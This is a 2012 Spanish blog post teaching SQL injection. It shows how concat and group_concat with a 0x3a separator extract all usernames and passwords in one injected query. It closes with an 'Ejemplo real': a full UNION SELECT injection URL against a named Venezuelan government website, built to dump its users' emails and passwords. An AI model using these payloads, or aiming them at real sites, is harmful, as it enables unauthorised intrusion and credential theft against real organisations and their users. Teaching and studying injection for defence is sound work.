sábado, 31 de marzo de 2012

Técnicas Avanzadas SQL Injection (1º Parte)

********************************************

Técnicas Avanzadas SQL Injection (1º Parte)
Técnicas Avanzadas SQL Injection (2º Parte)
Técnicas Avanzadas SQL Injection (3º Parte)

********************************************



Buenas a todos!

En estos post que iremos subiendo a lo largo de estos dias vamos a exponer diferentes técnicas que junto con las técnicas de sqli vistas hasta ahora conos permitiran sacar la información de forma mas rápida y eficaz.

Para empezar en este primer post veremos como podriamos concatenar ciertos resultados en una sql Injection.

Para todos aquellos que no esteis muy familiarizados aun con el lenguaje SQL vamos a ver una sentencia donde podríamos utilizar la concatenacion.

SELECT concat(usuario, 0x3a, password) FROM usuarios

Esto nos permitiria sacar en una unica consulta el usuarios y la contraseña separados por dos puntos, que es el carácter 3a en ascii.

Si esto lo utilizamos en una sql injection podriamos obtener lo siguiente:



Como podemos ver en la imagen hemos conseguido sacar el resultado de dos columnas en una única , ahora vamos a ver como podríamos sacar en una unica columna todos los resultados que quisieramos.

Para ello deberiamos utilizar la instruccion concat sumada con group_concat, lo cual nos permitirá sacar las dos columnas vistas anterior mente pero para todos los registros, no únicamente para uno solo.

Para ello deberemos realizar lo siguiente:

SELECT concat(group_concat(usuario,0x3a,password)) FROM usuarios

A continuación se muestra la imagen, donde se puede ver que la pagina nos a volcado los tres usuarios que tenemos metidos en la tabla usuarios. Esto puede ser realmente útil, ya que con una única consulta seriamos capaces de sacar todos los registros, por lo que no tendríamos que esta utilizando el limit todo el rato. Ademas de esto seria muy practico en casos donde solo tenemos una única columna vulnerable.



Lo vamos a dejar ya aqui en este post, pero en el siguiente seguiremos con nuevas técnicas mas avanzadas sobre sqli.

Un saludo!
Hykeos.

Ejemplo real:
http://www.bnv.gob.ve/desplegar_noticia.php?id=821+and+1=0+union+select+concat(group_concat(email,0x3a,contrase%F1a)),2,3+from+usuario
Publicado por en
Etiquetas:

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)